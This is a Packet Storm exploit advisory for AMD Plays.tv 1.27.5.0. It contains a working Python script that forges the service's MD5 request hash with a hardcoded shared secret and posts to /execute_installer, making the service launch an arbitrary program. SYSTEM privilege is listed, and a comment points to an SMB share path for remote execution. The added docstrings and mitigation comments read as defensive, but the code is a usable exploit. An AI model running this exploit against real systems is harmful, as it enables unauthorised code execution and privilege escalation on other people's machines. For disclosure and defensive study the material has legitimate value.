packetstorm | Securifera | PACKETSTORM:147199
History Apr 15, 2018 - 12:00 a.m.

AMD Plays.tv 1.27.5.0 Arbitrary File Execution

2018-04-15 00:00:00
Securifera
packetstormsecurity.com
21

0.505 Medium

EPSS

Percentile

97.5%

`########################################################################  
# http://support.amd.com/en-us/download?cmpid=CCCOffline -   
# Click "Automatically Detect - Download Now"  
# Installation Automatically Installs "Raptr, Inc Plays TV Service"  
#  
# OR  
#  
# https://plays.tv/download  
#  
# Target OS: Windows( Any )  
# Privilege: SYSTEM  
# Type: Arbitrary File Execution  
#  
# Notes: Second minor bug allows for arbitrary file write of   
# uncontrolled data using the /extract_files path.  
#  
########################################################################  
  
#!/usr/bin/python3  
import urllib.request  
import json  
import hashlib  
  
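def check_svc(path, data):
    """Report whether the endpoint at the module-level ``addr`` is the Plays TV service.

    Sends a POST without the ``data``/``hash`` form fields. The service
    rejects such a request with an HTTP error whose body is a fixed,
    distinctive string, so that string works as a fingerprint when
    inventorying hosts that still run the service.

    Args:
        path: Unused; the target URL is taken from the global ``addr``.
        data: Unused; a constant placeholder body is sent instead.

    Returns:
        "[+] Raptr, Plays TV service" when the fingerprint matches, otherwise
        "[-] Not Raptr, Plays TV service". The original fell through and
        returned None when an HTTP error carried any other body.

    Raises:
        urllib.error.URLError: The host or port could not be reached, or the
            connection timed out.
    """
    # Exact error body the service returns for a request with no hash/data.
    expected_error = 'Security failed - Missing hash or message[data]'

    request = urllib.request.Request(addr)
    try:
        # The timeout keeps a filtered port from hanging the check forever;
        # the context manager closes the response on the success path.
        with urllib.request.urlopen(request, "data".encode("utf-8"), timeout=10):
            pass
    except urllib.error.HTTPError as err:
        # Other HTTP servers may answer with non-UTF-8 bodies; do not crash on them.
        error_message = err.read().decode("utf-8", errors="replace")
        if error_message == expected_error:
            return "[+] Raptr, Plays TV service"
    return "[-] Not Raptr, Plays TV service"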
  
def post_req(path, data):
    """POST ``data`` to the module-level ``addr`` with the hash field the service checks.

    The request body is form-encoded with two fields: ``data`` (the JSON
    document) and ``hash`` (hex MD5 of ``path + JSON + secret``).

    NOTE(review): the secret is a fixed literal in this script, which implies
    the same value ships with every installation -- confirm against the
    vendor binary. If so, the hash proves nothing about the sender: anyone who
    can reach the port can compute it. The root cause to fix on the service
    side is the static shared secret combined with plain MD5 concatenation in
    place of per-install keyed authentication.

    Args:
        path: URL path of the endpoint; it is part of the hashed string.
        data: JSON-serialisable request document.

    Returns:
        The raw response body as bytes.
    """
    secret_key = 'a%qs0t33QgiE6ut^0I&Y'

    request = urllib.request.Request(addr)
    body_json = json.dumps(data)

    # Hash input order matters: path, then the JSON text, then the secret.
    digest = hashlib.md5((path + body_json + secret_key).encode('utf8')).hexdigest()

    form_fields = {'data': body_json, 'hash': digest}
    encoded_form = urllib.parse.urlencode(form_fields).encode("utf-8")
    response = urllib.request.urlopen(request, encoded_form)
    return response.read()
  
# Address of the host running the service (loopback = this machine).
ip = '127.0.0.1'

##############################################################
# The port is not fixed: the service binds to an ephemeral port
# that is recorded under
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452

##############################################################
# The service hands both request fields to CreateProcess as:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
# so whatever "installer" names is started by the service itself
# (the advisory header lists the resulting privilege as SYSTEM).
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
# Mitigation note: firewalling the service port and blocking
# outbound SMB both narrow this path; removing or updating the
# service closes it.
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe"  # Local Execution
data = dict(installer=cmd, appdata=cmd)

# Endpoint path; it is also an input to the request hash.
path = '/execute_installer'
addr = f"http://{ip}:{port}{path}"

# Optional fingerprint check for the Raptr Plays TV service
# (left disabled, as in the original listing).
#ret = check_svc(path, data)
#print(ret)

# Send the signed request and show the raw response.
ret = post_req(path, data)
print(ret)
  
`
